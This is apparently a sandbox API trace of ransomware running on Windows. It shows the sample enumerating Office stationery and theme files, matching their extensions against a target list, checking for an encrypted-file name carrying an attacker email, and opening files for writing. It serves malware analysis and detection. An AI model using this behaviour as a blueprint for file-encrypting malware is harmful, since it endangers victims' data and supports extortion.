	[0040.498] lstrlenW (lpString=".zip") returned 4
	[0040.498] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1
	[0040.498] lstrlenW (lpString=".rar") returned 4
	[0040.498] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1
	[0040.498] lstrlenW (lpString=".bz2") returned 4
	[0040.498] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1
	[0040.498] lstrlenW (lpString=".7z") returned 3
	[0040.498] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1
	[0040.498] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69
	[0040.498] lstrlenW (lpString=".dbf") returned 4
	[0040.498] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1
	[0040.498] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69
	[0040.498] lstrlenW (lpString=".1cd") returned 4
	[0040.498] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1
	[0040.498] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69
	[0040.498] lstrlenW (lpString=".jpg") returned 4
	[0040.498] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1
	[0040.498] lstrcmpiW (lpString1=".emf", lpString2=".bot") returned 1
	[0040.498] lstrlenW (lpString="Dotted_Lines.emf") returned 16
	[0040.498] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\dotted_lines.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0040.499] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=3792) returned 1
	[0040.499] CloseHandle (hObject=0x1a0) returned 1
	[0040.499] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\dotted_lines.emf")) returned 0x20
	[0040.499] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\dotted_lines.emf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0040.499] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\dotted_lines.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0040.499] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74
	[0040.499] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74
	[0040.499] lstrlenW (lpString=".doc") returned 4
	[0040.499] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1
	[0040.499] lstrlenW (lpString=".docx") returned 5
	[0040.499] lstrcmpiW (lpString1=".docx", lpString2="s.emf") returned -1
	[0040.499] lstrlenW (lpString=".pdf") returned 4
	[0040.499] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1
	[0040.499] lstrlenW (lpString=".xls") returned 4
	[0040.499] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1
	[0040.499] lstrlenW (lpString=".xlsx") returned 5
	[0040.499] lstrcmpiW (lpString1=".xlsx", lpString2="s.emf") returned -1
	[0040.499] lstrlenW (lpString=".ppt") returned 4
	[0040.499] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1
	[0040.499] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74
	[0040.499] lstrlenW (lpString=".zip") returned 4
	[0040.499] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1
	[0040.499] lstrlenW (lpString=".rar") returned 4
	[0040.500] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1
	[0040.500] lstrlenW (lpString=".bz2") returned 4
	[0040.500] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1
	[0040.500] lstrlenW (lpString=".7z") returned 3
	[0040.500] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1
	[0040.500] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74
	[0040.500] lstrlenW (lpString=".dbf") returned 4
	[0040.500] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1
	[0040.500] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74
	[0040.500] lstrlenW (lpString=".1cd") returned 4
	[0040.500] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1
	[0040.500] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74
	[0040.500] lstrlenW (lpString=".jpg") returned 4
	[0040.500] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1
	[0040.500] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74
	[0040.500] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74
	[0040.500] lstrlenW (lpString=".doc") returned 4
	[0040.500] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1
	[0040.500] lstrlenW (lpString=".docx") returned 5
	[0040.500] lstrcmpiW (lpString1=".docx", lpString2="s.emf") returned -1
	[0040.500] lstrlenW (lpString=".pdf") returned 4
	[0040.500] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1
	[0040.500] lstrlenW (lpString=".xls") returned 4
	[0040.500] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1
	[0040.500] lstrlenW (lpString=".xlsx") returned 5
	[0040.500] lstrcmpiW (lpString1=".xlsx", lpString2="s.emf") returned -1
	[0040.500] lstrlenW (lpString=".ppt") returned 4
	[0040.500] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1
	[0040.500] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74
	[0040.500] lstrlenW (lpString=".zip") returned 4
	[0040.500] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1
	[0040.500] lstrlenW (lpString=".rar") returned 4
	[0040.500] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1
	[0040.501] lstrlenW (lpString=".bz2") returned 4
	[0040.501] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1
	[0040.501] lstrlenW (lpString=".7z") returned 3
	[0040.501] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1
	[0040.501] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74
	[0040.501] lstrlenW (lpString=".dbf") returned 4
	[0040.501] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1
	[0040.501] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74
	[0040.501] lstrlenW (lpString=".1cd") returned 4
	[0040.501] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1
	[0040.501] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74
	[0040.501] lstrlenW (lpString=".jpg") returned 4
	[0040.501] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1
	[0040.501] lstrcmpiW (lpString1=".htm", lpString2=".bot") returned 1
	[0040.501] lstrlenW (lpString="Garden.htm") returned 10
	[0040.501] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0040.501] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=231) returned 1
	[0040.501] CloseHandle (hObject=0x1a0) returned 1
	[0040.501] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm")) returned 0x20
	[0040.501] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0040.502] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0040.502] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68
	[0040.502] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68
	[0040.502] lstrlenW (lpString=".doc") returned 4
	[0040.502] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1
	[0040.502] lstrlenW (lpString=".docx") returned 5
	[0040.502] lstrcmpiW (lpString1=".docx", lpString2="n.htm") returned -1
	[0040.502] lstrlenW (lpString=".pdf") returned 4
	[0040.502] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1
	[0040.502] lstrlenW (lpString=".xls") returned 4
	[0040.502] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1
	[0040.502] lstrlenW (lpString=".xlsx") returned 5
	[0040.502] lstrcmpiW (lpString1=".xlsx", lpString2="n.htm") returned -1
	[0040.502] lstrlenW (lpString=".ppt") returned 4
	[0040.502] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1
	[0040.502] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68
	[0040.502] lstrlenW (lpString=".zip") returned 4
	[0040.502] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1
	[0040.502] lstrlenW (lpString=".rar") returned 4
	[0040.502] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1
	[0040.502] lstrlenW (lpString=".bz2") returned 4
	[0040.502] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1
	[0040.502] lstrlenW (lpString=".7z") returned 3
	[0040.502] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1
	[0040.502] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68
	[0040.502] lstrlenW (lpString=".dbf") returned 4
	[0040.502] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1
	[0040.502] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68
	[0040.502] lstrlenW (lpString=".1cd") returned 4
	[0040.502] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1
	[0040.502] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68
	[0040.502] lstrlenW (lpString=".jpg") returned 4
	[0040.502] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1
	[0040.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68
	[0040.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68
	[0040.503] lstrlenW (lpString=".doc") returned 4
	[0040.503] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1
	[0040.503] lstrlenW (lpString=".docx") returned 5
	[0040.503] lstrcmpiW (lpString1=".docx", lpString2="n.htm") returned -1
	[0040.503] lstrlenW (lpString=".pdf") returned 4
	[0040.503] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1
	[0040.503] lstrlenW (lpString=".xls") returned 4
	[0040.503] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1
	[0040.503] lstrlenW (lpString=".xlsx") returned 5
	[0040.503] lstrcmpiW (lpString1=".xlsx", lpString2="n.htm") returned -1
	[0040.503] lstrlenW (lpString=".ppt") returned 4
	[0040.503] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1
	[0040.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68
	[0040.503] lstrlenW (lpString=".zip") returned 4
	[0040.503] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1
	[0040.503] lstrlenW (lpString=".rar") returned 4
	[0040.503] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1
	[0040.503] lstrlenW (lpString=".bz2") returned 4
	[0040.503] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1
	[0040.503] lstrlenW (lpString=".7z") returned 3
	[0040.503] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1
	[0040.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68
	[0040.503] lstrlenW (lpString=".dbf") returned 4
	[0040.503] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1
	[0040.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68
	[0040.503] lstrlenW (lpString=".1cd") returned 4
	[0040.503] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1
	[0040.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68
	[0040.503] lstrlenW (lpString=".jpg") returned 4
	[0040.503] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1
	[0040.504] lstrcmpiW (lpString1=".jpg", lpString2=".bot") returned 1
	[0040.504] lstrlenW (lpString="Garden.jpg") returned 10
	[0040.504] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0040.504] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=23871) returned 1
	[0040.504] CloseHandle (hObject=0x1a0) returned 1
	[0040.504] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg")) returned 0x20
	[0040.504] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0040.504] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0040.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68
	[0040.505] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68
	[0040.505] lstrlenW (lpString=".doc") returned 4
	[0040.505] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1
	[0040.505] lstrlenW (lpString=".docx") returned 5
	[0040.505] lstrcmpiW (lpString1=".docx", lpString2="n.jpg") returned -1
	[0040.505] lstrlenW (lpString=".pdf") returned 4
	[0040.505] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1
	[0040.505] lstrlenW (lpString=".xls") returned 4
	[0040.505] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1
	[0040.505] lstrlenW (lpString=".xlsx") returned 5
	[0040.505] lstrcmpiW (lpString1=".xlsx", lpString2="n.jpg") returned -1
	[0040.505] lstrlenW (lpString=".ppt") returned 4
	[0040.505] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1
	[0040.505] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68
	[0040.505] lstrlenW (lpString=".zip") returned 4
	[0040.505] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1
	[0040.505] lstrlenW (lpString=".rar") returned 4
	[0040.505] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1
	[0040.505] lstrlenW (lpString=".bz2") returned 4
	[0040.505] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1
	[0040.505] lstrlenW (lpString=".7z") returned 3
	[0040.505] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1
	[0040.505] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68
	[0040.505] lstrlenW (lpString=".dbf") returned 4
	[0040.505] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1
	[0040.505] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68
	[0040.505] lstrlenW (lpString=".1cd") returned 4
	[0040.505] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1
	[0040.505] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68
	[0040.505] lstrlenW (lpString=".jpg") returned 4
	[0040.505] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0
	[0040.505] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68
	[0040.505] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68
	[0040.506] lstrlenW (lpString=".doc") returned 4
	[0040.506] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1
	[0040.506] lstrlenW (lpString=".docx") returned 5
	[0040.506] lstrcmpiW (lpString1=".docx", lpString2="n.jpg") returned -1
	[0040.506] lstrlenW (lpString=".pdf") returned 4
	[0040.506] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1
	[0040.506] lstrlenW (lpString=".xls") returned 4
	[0040.506] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1
	[0040.506] lstrlenW (lpString=".xlsx") returned 5
	[0040.506] lstrcmpiW (lpString1=".xlsx", lpString2="n.jpg") returned -1
	[0040.506] lstrlenW (lpString=".ppt") returned 4
	[0040.506] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1
	[0040.506] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68
	[0040.506] lstrlenW (lpString=".zip") returned 4
	[0040.506] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1
	[0040.506] lstrlenW (lpString=".rar") returned 4
	[0040.506] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1
	[0040.506] lstrlenW (lpString=".bz2") returned 4
	[0040.506] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1
	[0040.506] lstrlenW (lpString=".7z") returned 3
	[0040.506] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1
	[0040.506] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68
	[0040.506] lstrlenW (lpString=".dbf") returned 4
	[0040.506] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1
	[0040.506] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68
	[0040.506] lstrlenW (lpString=".1cd") returned 4
	[0040.506] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1
	[0040.506] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68
	[0040.506] lstrlenW (lpString=".jpg") returned 4
	[0040.506] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0
	[0040.506] lstrcmpiW (lpString1=".emf", lpString2=".bot") returned 1
	[0040.507] lstrlenW (lpString="Genko_1.emf") returned 11
	[0040.507] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_1.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0042.258] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=5524) returned 1
	[0042.258] CloseHandle (hObject=0x1f8) returned 1
	[0042.258] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_1.emf")) returned 0x20
	[0042.258] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_1.emf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0042.258] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_1.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0042.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69
	[0042.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69
	[0042.258] lstrlenW (lpString=".doc") returned 4
	[0042.258] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1
	[0042.258] lstrlenW (lpString=".docx") returned 5
	[0042.259] lstrcmpiW (lpString1=".docx", lpString2="1.emf") returned -1
	[0042.259] lstrlenW (lpString=".pdf") returned 4
	[0042.259] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1
	[0042.259] lstrlenW (lpString=".xls") returned 4
	[0042.259] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1
	[0042.259] lstrlenW (lpString=".xlsx") returned 5
	[0042.259] lstrcmpiW (lpString1=".xlsx", lpString2="1.emf") returned -1
	[0042.259] lstrlenW (lpString=".ppt") returned 4
	[0042.259] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1
	[0042.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69
	[0042.259] lstrlenW (lpString=".zip") returned 4
	[0042.259] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1
	[0042.259] lstrlenW (lpString=".rar") returned 4
	[0042.259] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1
	[0042.259] lstrlenW (lpString=".bz2") returned 4
	[0042.259] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1
	[0042.259] lstrlenW (lpString=".7z") returned 3
	[0042.259] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1
	[0042.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69
	[0042.259] lstrlenW (lpString=".dbf") returned 4
	[0042.259] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1
	[0042.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69
	[0042.259] lstrlenW (lpString=".1cd") returned 4
	[0042.259] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1
	[0042.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69
	[0042.259] lstrlenW (lpString=".jpg") returned 4
	[0042.259] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1
	[0042.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69
	[0042.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69
	[0042.259] lstrlenW (lpString=".doc") returned 4
	[0042.259] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1
	[0042.259] lstrlenW (lpString=".docx") returned 5
	[0042.259] lstrcmpiW (lpString1=".docx", lpString2="1.emf") returned -1
	[0042.260] lstrlenW (lpString=".pdf") returned 4
	[0042.260] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1
	[0042.260] lstrlenW (lpString=".xls") returned 4
	[0042.260] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1
	[0042.260] lstrlenW (lpString=".xlsx") returned 5
	[0042.260] lstrcmpiW (lpString1=".xlsx", lpString2="1.emf") returned -1
	[0042.260] lstrlenW (lpString=".ppt") returned 4
	[0042.260] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1
	[0042.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69
	[0042.260] lstrlenW (lpString=".zip") returned 4
	[0042.260] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1
	[0042.260] lstrlenW (lpString=".rar") returned 4
	[0042.260] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1
	[0042.260] lstrlenW (lpString=".bz2") returned 4
	[0042.260] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1
	[0042.260] lstrlenW (lpString=".7z") returned 3
	[0042.260] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1
	[0042.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69
	[0042.260] lstrlenW (lpString=".dbf") returned 4
	[0042.260] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1
	[0042.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69
	[0042.260] lstrlenW (lpString=".1cd") returned 4
	[0042.260] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1
	[0042.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69
	[0042.260] lstrlenW (lpString=".jpg") returned 4
	[0042.260] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1
	[0042.260] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0042.260] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0042.260] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0042.261] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=2848) returned 1
	[0042.261] CloseHandle (hObject=0x1f8) returned 1
	[0042.261] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif")) returned 0x20
	[0042.261] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0042.261] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
